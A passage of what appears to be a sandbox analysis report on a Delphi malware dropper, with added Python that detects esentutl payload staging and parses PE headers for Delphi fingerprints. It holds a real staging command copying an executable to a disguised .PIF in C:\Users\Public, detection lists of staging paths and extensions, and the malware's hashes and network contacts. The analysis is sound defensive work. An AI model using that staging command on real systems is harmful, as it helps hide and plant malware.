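SAMPLE_CMDLINE = r'"C:\Windows\SysWOW64\esentutl.exe" /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o'

EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".pif", ".com", ".cpl"}
MASQUERADE_EXTS = {".pif", ".scr", ".com", ".cmd"}  # executes like .exe, does not look like one
STAGING_DIRS = ("c:\\users\\public", "c:\\programdata", "c:\\windows\\temp")
ESENTUTL_COPY_RE = re.compile(
    r'(?i)\besentutl(?:\.exe)?"?\s.*?/y\s+("[^"]+"|\S+)\s+/d\s+("[^"]+"|\S+)')


def _normalise(path):
    """Collapse the doubled backslashes esentutl echoes and strip quotes."""
    return re.sub(r"\\+", r"\\", path.strip().strip('"'))


def parse_esentutl_copy(output):
    """Extract (source, destination) from esentutl's COPY FILE mode banner, or None."""
    if "Initiating COPY FILE mode" not in output:
        return None
    src = re.search(r"Source File:\s*(.+)", output)
    dst = re.search(r"Destination File:\s*(.+)", output)
    if not (src and dst):
        return None
    return _normalise(src.group(1)), _normalise(dst.group(1))


def parse_esentutl_cmdline(cmdline):
    """Extract (source, destination) from an 'esentutl /y ... /d ...' command line, or None."""
    m = ESENTUTL_COPY_RE.search(cmdline)
    return (_normalise(m.group(1)), _normalise(m.group(2))) if m else None


def assess_copy(src, dst):
    """Reasons this copy looks like payload staging rather than ESE database maintenance."""
    s, d = PureWindowsPath(src), PureWindowsPath(dst)
    reasons = []
    if s.suffix.lower() in EXECUTABLE_EXTS:
        reasons.append("source is an executable, not an ESE database or log")
    if d.suffix.lower() in MASQUERADE_EXTS:
        reasons.append(f"destination extension {d.suffix} executes but does not look like .exe")
    if str(d.parent).lower().startswith(STAGING_DIRS):
        reasons.append("destination is a world-writable staging directory")
    if s.stem.lower() != d.stem.lower():
        reasons.append(f"file renamed from {s.name} to {d.name} during copy")
    return reasons


if __name__ == "__main__":
    src, dst = parse_esentutl_copy(SAMPLE_OUTPUT)
    print(f"esentutl copied {src} -> {dst}")
    for reason in assess_copy(src, dst):
        print(" -", reason)
    print("same pair from command line:", parse_esentutl_cmdline(SAMPLE_CMDLINE) == (src, dst))
```

In a detection pipeline the command-line parser is the one to run on process-creation events (Sysmon Event ID 1 or Security 4688); the output parser is useful when, as here, only the redirected console text survives in a sandbox or forensic image.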
                                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66
                                                                                                              Entropy (8bit):4.524640141725149
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                              MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                              SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                              SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                              SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                              Malicious:false
                                                                                                              Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.9272903664814445
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:x.exe
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5:31bc6907d6097a76bb1dd891cfc09b7a
                                                                                                              SHA1:97340ca203a1207e492135d580c6860a724a227f
                                                                                                              SHA256:f711703c8ba66dcedb8e4b83f21a0425c528e278242c852fd5cf54bb43e30454
                                                                                                              SHA512:6c217fa37cc4c655cda0a2a491e49ac736e4940027178b3c7d6488d296923d40cc26a4d0142052b94b58491fa90f17ab3f4115cb0c75efe09175e732d62dbbf5
                                                                                                              SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                              TLSH:2835AF7AF6744861E037A5398CCB67A6582DBF7C1928B4C226F65B7C2E3A350340BD53
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                              Icon Hash:08302020c0c92020
                                                                                                              Entrypoint:0x46475c
                                                                                                              Entrypoint Section:.itext
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:ea87ad3ff9b755fe3923cfc8eb894da6
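The header fields above carry two Borland/Delphi linker fingerprints: the 'MZP' DOS stub visible in the content preview and the fixed link timestamp 0x2A425E19 (19 June 1992 22:22:17 UTC), which Delphi-built binaries carry regardless of when they were actually compiled, so the timestamp says nothing about the campaign date. The entry point 0x46475c also sits in .itext, the section Delphi uses for its initialization code. The Python below is an added example, not part of the report, that parses a PE32 header far enough to recover those facts. The sample image it builds is constructed with this report's entry point, image base, timestamp, characteristics and section names; the section sizes are assumed and it contains no code.

```python
import struct
from datetime import datetime, timezone

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
PE32_MAGIC = 0x10B
# Fixed link time the Borland/Delphi linker writes instead of the real build time.
BORLAND_LINKER_TIMESTAMP = 0x2A425E19
# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_HEADER_FMT = "<HHIIIHH"
# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers,
# Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"


def parse_pe(data):
    """Parse a PE32 image's headers far enough to locate the entry point and sections."""
    if data[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("PE signature not found at e_lfanew")
    coff_off = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        COFF_HEADER_FMT, data, coff_off)
    opt_off = coff_off + 20
    if struct.unpack_from("<H", data, opt_off)[0] != PE32_MAGIC:
        raise ValueError("only PE32 optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]   # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt_off + 28)[0]  # ImageBase (PE32 layout)
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HEADER_FMT, data, opt_off + opt_size + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": f[1], "virtual_address": f[2], "raw_size": f[3]})
    return {"machine": machine, "timestamp": timestamp, "characteristics": characteristics,
            "entry_rva": entry_rva, "image_base": image_base, "sections": sections,
            # 'MZP': the Borland/Delphi linker's DOS stub sets the byte after 'MZ' to 'P'.
            "borland_stub": data[:3] == b"MZP"}


def entry_section(pe):
    """Name of the section whose virtual range contains the entry point, or None."""
    for s in pe["sections"]:
        size = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= pe["entry_rva"] < s["virtual_address"] + size:
            return s["name"]
    return None


def triage(pe):
    ts = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    return {
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "entry_section": entry_section(pe),
        "timestamp_utc": ts.strftime("%Y-%m-%d %H:%M:%S"),
        "fixed_borland_timestamp": pe["timestamp"] == BORLAND_LINKER_TIMESTAMP,
        "borland_stub": pe["borland_stub"],
    }


def build_sample_pe():
    """Constructed PE32 skeleton (headers only) using the values this report lists."""
    dos = bytearray(64)
    dos[:3] = b"MZP"                          # Delphi stub signature
    struct.pack_into("<I", dos, 0x3C, 64)     # e_lfanew: PE header right after the DOS header
    # 0x818E = EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED |
    #          BYTES_REVERSED_LO | 32BIT_MACHINE | BYTES_REVERSED_HI
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, 2, BORLAND_LINKER_TIMESTAMP, 0, 0, 224, 0x818E)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x6475C)  # entry RVA: 0x46475c - 0x400000
    struct.pack_into("<I", opt, 28, 0x400000)
    secs = b""
    for name, va, size in ((b".text", 0x1000, 0x62000), (b".itext", 0x63000, 0x2000)):
        # Section sizes are assumed; only the names come from the report.
        secs += struct.pack(SECTION_HEADER_FMT, name.ljust(8, b"\0"), size, va, size,
                            0, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + IMAGE_NT_SIGNATURE + coff + bytes(opt) + secs


if __name__ == "__main__":
    for key, value in triage(parse_pe(build_sample_pe())).items():
        print(f"{key}: {value:#x}" if type(value) is int else f"{key}: {value}")
```

When run over a real corpus the fixed-timestamp and MZP checks identify Delphi builds (DBatLoader and many other Delphi droppers) without signatures, and the entry-section check separates them from packed samples whose entry point lands in an unnamed or writable section.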
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
mov eax, 00463490h
call 00007F5829356ED9h
mov eax, dword ptr [00466C04h]
mov eax, dword ptr [eax]
call 00007F58293AA1A9h
mov ecx, dword ptr [00466CF8h]
mov eax, dword ptr [00466C04h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00462264h]
call 00007F58293AA1A9h
mov ecx, dword ptr [00466D30h]
mov eax, dword ptr [00466C04h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00462064h]
call 00007F58293AA191h
call 00007F5829354DA4h
lea eax, dword ptr [eax+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6b000 | 0x2536 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x78000 | 0x99400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x7230 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6f000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6b6e4 | 0x5cc | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x626e0 | 0x62800 | d57bd0e6646e792cf3a8b0429a5b2336 | False | 0.5127300126903553 | data | 6.509466837289833 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x64000 | 0x7b0 | 0x800 | 20a59b0afa52ae48c0f33c7bcb0e6f95 | False | 0.60693359375 | data | 6.022301347009192 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x65000 | 0x1d98 | 0x1e00 | c44ec72c2f706b9a0c3271d1f8179421 | False | 0.4016927083333333 | data | 3.872761412786969 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x67000 | 0x36ac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6b000 | 0x2536 | 0x2600 | f2768d24a229e45d9b72c514c6905c1f | False | 0.3190789473684211 | data | 5.1451129727895095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x6e000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x6f000 | 0x18 | 0x200 | e69c9ffd209bb239dd4bf62d0475d59b | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x70000 | 0x7230 | 0x7400 | 8c16d72a0182b5ddd3a8d48f93bccff6 | False | 0.615167025862069 | data | 6.65870845851274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x78000 | 0x99400 | 0x99400 | 3ac8474f7e2f3188227a6a1a6e7e8ae3 | False | 0.40286628262642743 | data | 6.568668310967687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x78b30 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x78c64 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x78d98 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x78ecc | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x79000 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x79134 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x79268 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x7939c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x7956c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x79750 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x79920 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x79af0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x79cc0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x79e90 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x7a060 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7a230 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x7a400 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7a5d0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x7a6b8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.0979253112033195
RT_ICON | 0x7cc60 | 0x15b7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.908256880733945
RT_DIALOG | 0x7e218 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x7e26c | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x7e2c0 | 0x174 | Targa image data - Color 99 x 107 x 32 +68 +111 "z" | | | 0.5161290322580645
RT_STRING | 0x7e434 | 0x208 | data | | | 0.5365384615384615
RT_STRING | 0x7e63c | 0xcc | data | | | 0.6715686274509803
RT_STRING | 0x7e708 | 0xe4 | data | | | 0.6403508771929824
RT_STRING | 0x7e7ec | 0x3f4 | data | | | 0.4041501976284585
RT_STRING | 0x7ebe0 | 0x3a8 | data | | | 0.36538461538461536
RT_STRING | 0x7ef88 | 0x394 | data | | | 0.3941048034934498
RT_STRING | 0x7f31c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0x7f714 | 0xf4 | data | | | 0.5532786885245902
RT_STRING | 0x7f808 | 0xc4 | data | | | 0.6275510204081632
RT_STRING | 0x7f8cc | 0x22c | data | | | 0.5017985611510791
RT_STRING | 0x7faf8 | 0x3b4 | data | | | 0.3227848101265823
RT_STRING | 0x7feac | 0x368 | data | | | 0.37844036697247707
RT_STRING | 0x80214 | 0x2b8 | data | | | 0.3879310344827586
RT_RCDATA | 0x804cc | 0x10 | data | | | 1.5
RT_RCDATA | 0x804dc | 0x310 | data | | | 0.6977040816326531
RT_RCDATA | 0x807ec | 0xa20 | Delphi compiled form 'TForm1' | | | 0.41435185185185186
RT_RCDATA | 0x8120c | 0x755 | Delphi compiled form 'TForm2' | | | 0.42301545018646775
RT_RCDATA | 0x81964 | 0x8f838 | PNG image data, 225 x 225, 8-bit colormap, non-interlaced | English | United States | 0.4054559806203133
RT_GROUP_CURSOR | 0x11119c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1111b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1111c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1111d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1111ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x111200 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x111214 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x111228 | 0x22 | data | | | 1.0588235294117647
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T15:55:02.088938+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 198.252.105.91 | 443 | TCP
2024-11-12T15:55:20.344502+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49721 | TCP
2024-11-12T15:55:58.715306+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49888 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 15:55:01.434278011 CET | 49709 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.434331894 CET | 443 | 49709 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:01.434422016 CET | 49709 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.434942961 CET | 49709 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.434993029 CET | 443 | 49709 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:01.435061932 CET | 49709 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.472915888 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.472968102 CET | 443 | 49710 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:01.473043919 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.477974892 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:01.477991104 CET | 443 | 49710 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:02.088825941 CET | 443 | 49710 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:02.088937998 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:02.093328953 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
Nov 12, 2024 15:55:02.093347073 CET | 443 | 49710 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:02.093650103 CET | 443 | 49710 | 198.252.105.91 | 192.168.2.6
Nov 12, 2024 15:55:02.146259069 CET | 49710 | 443 | 192.168.2.6 | 198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.298863888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.343328953 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.421322107 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.465269089 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537437916 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537461996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537483931 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537491083 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537512064 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537702084 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537702084 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537729025 CET44349710198.252.105.91192.168.2.6
